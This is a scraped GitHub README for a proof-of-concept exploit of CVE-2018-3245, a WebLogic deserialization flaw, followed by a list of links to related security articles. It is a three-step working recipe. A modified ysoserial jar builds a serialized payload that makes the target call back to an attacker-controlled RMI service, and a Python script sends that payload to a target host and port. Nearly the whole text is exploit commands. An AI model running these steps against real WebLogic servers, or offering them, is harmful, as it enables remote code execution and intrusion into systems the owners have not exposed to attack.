GitHub - pyn3rd/CVE-2018-3245: CVE-2018-3245-PoC

Step 1

java -jar ysoserial-cve-2018-3245.jar

WHY SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
     Payload         Authors   Dependencies
     -------         -------   ------------
     CVE_2018_2893_1 @mbechler
     CVE_2018_2893_2 @mbechler
     CVE_2018_2893_3 @mbechler
     CVE_2018_3245   @mbechler
     JRMPClient      @mbechler
     Jdk7u21         @frohoff

Step 2

java -jar ysoserial-cve-2018-3245.jar CVE_2018_3245 "[RMI_SERVICE_IP]:[PORT]" > poc5.ser

Step 3

python weblogic.py [TARGET_HOST] [PORT] poc5.ser


为您推荐了相关的技术文章:

  1. qazbnm456/awesome-cve-poc
  2. SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合
  3. Owning OnePlus 3/3T with a Malicious Charger: The Last Piece of the Puzzle
  4. PHP :: Sec Bug #73192 :: parse_url return wrong hostname
  5. ilmila/J2EEScan

原文链接: github.com